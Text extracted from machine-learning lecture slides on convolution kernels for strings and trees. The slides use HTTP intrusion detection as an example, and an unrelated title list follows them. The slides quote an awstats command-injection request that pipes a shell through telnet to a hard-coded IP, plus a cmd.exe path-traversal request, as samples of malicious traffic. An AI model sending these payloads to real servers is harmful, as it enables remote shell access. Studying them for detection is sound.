Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A =...

Lecture 9Kernel Methods for Structured Inputs

Pavel Laskov1 Blaine Nelson1

1Cognitive Systems Group

Wilhelm Schickard Institute for Computer Science

Universitat Tubingen, Germany

Advanced Topics in Machine Learning, 2012

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 1 / 30

What We Have Learned So Far

∗c∗

Learning problems are defined in terms of kernel functions reflecting thegeometry of training data.

What if the data does not naturally belong to inner product spaces?

Example: Intrusion Detection

> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d

\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel

Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a\x0d\x0a

> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%

20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0a

Cookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:

27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost

: www.thedailywtf.com\x0d\x0a\x0d\x0a

Examples of Structured Input Data

Histograms

TreesS

the apple

the red

Strings

Graphs

Convolution Kernels in a Nutshell

Decompose structured objects into comparable parts.

Aggregate the values of similarity measures for individual parts.

R-Convolution

Let X be a set of composite objects (e.g., cars), and X1, . . . , XD be setsof parts (e.g., wheels, brakes, etc.). All sets are assumed countable.

Let R denote the relation “being part of”:

R(x1, . . . , xD , x) = 1, iff x1, . . . , xD are parts of x

The inverse relation R−1 is defined as:

R−1(x) = {x : R(x, x) = 1}

In other words, for each object x , R−1(x) is a set of component subsets,that are part of x .

We say that R is finite, if R−1 is finite for all x ∈ X .

R-Convolution: A Naive Example

wheels

headlights

bumpers

transmission

differential

tow coupling

Alfa Romeo Junior Lada Niva

R-Convolution: Further Examples

Let x be a D-tuple in X = X1 × . . . × XD . Let each of the Dcomponents of x ∈ X be a part of x . Then R(x, x) = 1 iff x = x .

Let X1 = X2 = X be sets of all finite strings over a finite alphabet.Define R(x1, x2, x) = 1 iff x = x1 ◦ x2, i.e. concatenation of x1 and x2.

Let X1 = . . . = XD = X be a set of D-degree ordered and rooted trees.Define R(x, x) = 1 iff x1, . . . , xD are D subtrees of the root of x ∈ X .

R-Convolution Kernel

Definition

Let x , y ∈ X and x and y be the corresponding sets of parts. LetKd (xd , yd ) be a kernel between the d -th parts of x and y (1 ≤ d ≤ D).Then the convolution kernel between x and y is defined as:

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

Kd (xd , yd )

Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

Linear kernel K (x , y) =∑D

d=1 xdyd is not a convolution kernel, exceptfor the trivial “single part” decomposition. For any other decomposition,we would need to sum products of more than one term, whichcontradicts the formula for the linear kernel.

Subset Product Kernel

Theorem

Let K be a kernel on a set U × U. The for all finite, non-empty subsetsA,B ⊆ U,

K ′(A,B) =∑

K (x , y)

is a valid kernel.

Subset Product Kernel

Proof.

Goal: show that K ′(A,B) is an inner product in some space...

Recall that for any point u ∈ U, K (u, ·) is a function Ku in some RKHSH. Let fA =

u∈A Ku, fB =∑

u∈B Ku . Define

〈fA, fB〉 :=∑

K (x , y)

We need to show that it satisfies properties of an inner product... LetfC =

u∈C Ku . Clearly,

〈fA + fC , fB〉 =∑

x∈A∪C

K (x , y) =∑

K (x , y) +∑

K (x , y)

Other properties of the inner product can be proved similarly.

Back to the R-Convolution Kernel

Theorem

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

Kd (xd , yd )

is a valid kernel.

Back to the R-Convolution Kernel

Proof.

Let U = X1 × . . .× XD . From the closure of kernels under the tensorproduct, it follows that

K (x, y) =

Kd (xd , yd )

is a kernel on U × U. Applying the Subset Product Kernel Theorem forA = R−1(x), B = R−1(y), the theorem’s claim follows.

End of Theory ,

Convolution Kernels for Strings

Let x , y ∈ A∗ be two strings generated from the alphabet A. How can wedefine K (x , y) using the ideas of convolution kernels?

Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.

For any x ∈ A∗ and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x .

Then R−1(x) is a set of all n-grams contained in x .

Define K (x , y) = 1[x=y ].

Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

Convolution Kernels for Strings (ctd.)

An alternative definition of a kernel for two strings can be obtained asfollows:

Let D = 1, take X1 to be the set of all possible strings of arbitrarylength generated from the alphabet A. |X1| = ∞.

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

Notice that the size of the summation remains finite despite the infinitedimensionality of X1.

Geometry of String Kernels

Sequences

1. blabla blubla blablabu aa

2. bla blablaa bulab bb abla

3. a blabla blabla ablub bla

4. blab blab abba blabla blu

Geometry

Subsequences

Features

Histograms of subsequencesa b aa

Metric Embedding of Strings

Define the language S ⊆ A∗ of possiblefeatures, e.g., n-grams, words, allsubsequences.

For each sequence x , count occurrences ofeach feature in it:

φ : x −→ (φs(x))s∈S

Use φs(x) as the s-th coordinate of x in thevector space of dimensionality |S |.

Define K (x , y) := 〈φs(x), φs (y)〉. This is equivalent to K (x , y) definedby the convolution kernel!

Similarity Measure for Embedded Strings

Metric embedding enables application of various vectorial similaritymeasures over sequences, e.g.

Kernels K (x , y)

Linear∑

φs(x)φs(y)

RBF exp(d(x , y)2/σ)

Similarity coefficients

Jaccard, Kulczynski, . . .

Distances d(x , y)

Manhattan∑

|φs(x)− φs(y)|

Minkowski k

|φs(x) − φs(y)|k

Hamming∑

sgn |φs(x) − φs(y)|

Chebyshev maxs∈S

|φs(x) − φs(y)|

Embedding example

X = abrakadabraY = barakobama

Embedding example

X Y X · Y

a/5 a/4 20

b/2 b/2 4

k/1 k/1 1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦

Embedding example

X Y X · Y

a/5 a/4 20

b/2 b/2 4

k/1 k/1 1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦

X Y X · Y

ak/1 ak/1 1

ra/2 ra/1 2

4.00 3.46 3

∠XY = 77.5◦

Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.

Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.

Implementation strategies

Explicit but sparse representation of feature vectors

⇒ sorted arrays or hash tables

Implicit and general representations

⇒ tries, suffix trees, suffix arrays

String Kernels using Sorted Arrays

Store all features in sorted arrays

Traverse feature arrays of two samples to find mathing elements

aa (3)

ab (3)

ab (2)

ba (2)

bc (2)

bb (1)

cc (1)

bc (4)

Running time:

Sorting: O(n)Comparison: O(n)

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

“abbaa” · “baaaa” = 0

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

3 4 2 1

1 3 1 1

aa 1 3

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

3 4 2 1

1 3 1 1

aa 1 3

ab 1 0

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

3 4 2 1

1 3 1 1

aa 1 3

ab 1 0

ba 1 1

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

3 4 2 1

1 3 1 1

aa 1 3

ab 1 0

ba 1 1

bb 1 0

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

3 4 2 1

1 3 1 1

Tree Kernels: Motivation

Trees are ubiquitous representations in various applications:

Parsing: parse treesContent representation: XML, DOMBioinformatics: philogeny

Ad-hoc features related to trees, e.g. number of nodes or edges, are notinformative for learning

Structural properties of trees, on the other hand, may be verydiscriminative

Example: Normal HTTP Request

GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>

Referer: http://host/<NL> Connection: keep-alive<NL>

<path>

/test.gif

HTTP/1.1

<hdr>1

Accept:

<hdr>2

Referer:

http://host

<hdr>3

Connection:

keep-alive

Example: Malicious HTTP Request

GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0

<path>

/scripts/..%%35c../.../cmd.exe?

/c+dir+c:\

HTTP/1.0

Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

/ Problem: Testing for equality between two trees may be extremelycostly!

Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.

Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.

Recursive scheme

Let Ch(x) denote the set of immediate children of the root of (sub)tree x .|x | := |Ch(x)|.

If Ch(x) 6= Ch(y ) return 0.

If |x | = |y |, return 1.

Otherwise return

K (x , y) =

|x|∏

(1 + K (xi , yi))

Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

Add one for the nodes themselves (subtrees of cardinality 1).

Add counts for all mathing subtrees.

Multiply together and return the total count.

Summary

Kernels for structured data extend learning methods to a vast variety ofpractical data types.

A generic framework for handling structured data is offered byconvolution kernels.

Special data structures and algorithms are needed for efficiency.

Extensive range of applications:

natural language processingbioinformaticscomputer security

Bibliography I

[1] M. Collins and N. Duffy. Convolution kernel for natural language. InAdvances in Neural Information Proccessing Systems (NIPS), volume 16,pages 625–632, 2002.

[2] D. Haussler. Convolution kernels on discrete structures. Technical ReportUCSC-CRL-99-10, UC Santa Cruz, July 1999.

[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures forsequential data. Journal of Machine Learning Research, 9:23–48, 2008.

Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A =...

Documents

RESEARCH ARTICLE Open Access Walk-weighted …four kernel methods: predicate kernel and walk kernel (feature-based), dependency kernel (structure-based ker-nel), and hybrid kernel

Kernel Methods Arie Nakhmani. Outline Kernel Smoothers Kernel Density Estimators Kernel Density Classifiers

KERNEL OF THE KERNEL - IslamicBlessings.comislamicblessings.com/upload/Kernel of the Kernel.pdf · SUNY Series in Islam Seyyed Hossein Nasr, editor Faghfoory: Kernel of the Kernel

Introduction to Computer Security - UNIX Security · Introduction to Computer Security UNIX Security Pavel Laskov Wilhelm Schickard Institute for Computer Science

Solaris 10 Kernel Solaris 10 Kernel Presentation

Introduction to Kernel Methods - GitHub Pages · to Kernel Methods F. Gonz alez Introduction The Kernel Trick The Kernel Approach to Machine Learning A Kernel Pattern Analysis Algorithm

Introduction to Computer Security - uni-tuebingen.de · Introduction to Computer Security Foundations of Cryptography Pavel Laskov Wilhelm Schickard Institute for Computer Science

µµ--Kernel Construction (6)Kernel Construction (6)

Reproducing kernel Hilbert C -module and kernel mean

MACHINE LEARNING kernel CCA, kernel Kmeans …lasa.epfl.ch/.../Slides/kCCA-kKmeans-SpectralClustering.pdfMACHINE LEARNING kernel CCA, kernel Kmeans Spectral Clustering MACHINE LEARNING

T2EX Programming with - T-Kernel...SMP Extension supporting AMP AMP T-Kernel SMP T-Kernel MP T-Kernel 2.0 ITRON µITRON4.0 µT-Kernel µT-Kernel 2.0 T-Kernel T2PX GNU/GCC Eclipse One

Introduction to Computer Security - Course Introduction€¦ · · 2011-04-20Introduction to Computer Security Course Introduction Pavel Laskov Wilhelm Schickard Institute for Computer

T-Kernel Specification (1.00.00) - tron.org · T-Kernel/OS.....? T-Kernel? • • • • 1

Sayyid Muhammad Husayn Tabataba’i - Kernel of the Kernel

Kernel Recipes 2013 - Kernel for your device

OSUE Linux Kernel Modul Bonusbeispiel · OSUE Linux Kernel Modul Bonusbeispiel Frömel Der Linux Kernel Kernel Modul Appplication vs. Kernel Modul Device Drivers Allgemeines I Linux

Nested Kernel: An Operating System Architecture for Intra ... · monolithic kernel into two privilege domains: the nested kernel and the outer kernel. The nested kernel is a subset

SimGrid Kernel 101 Introducing the SimGrid Kernel

linux* kernel scalability linux* kernel scalability

Kernel Architecture : UNIX Kernel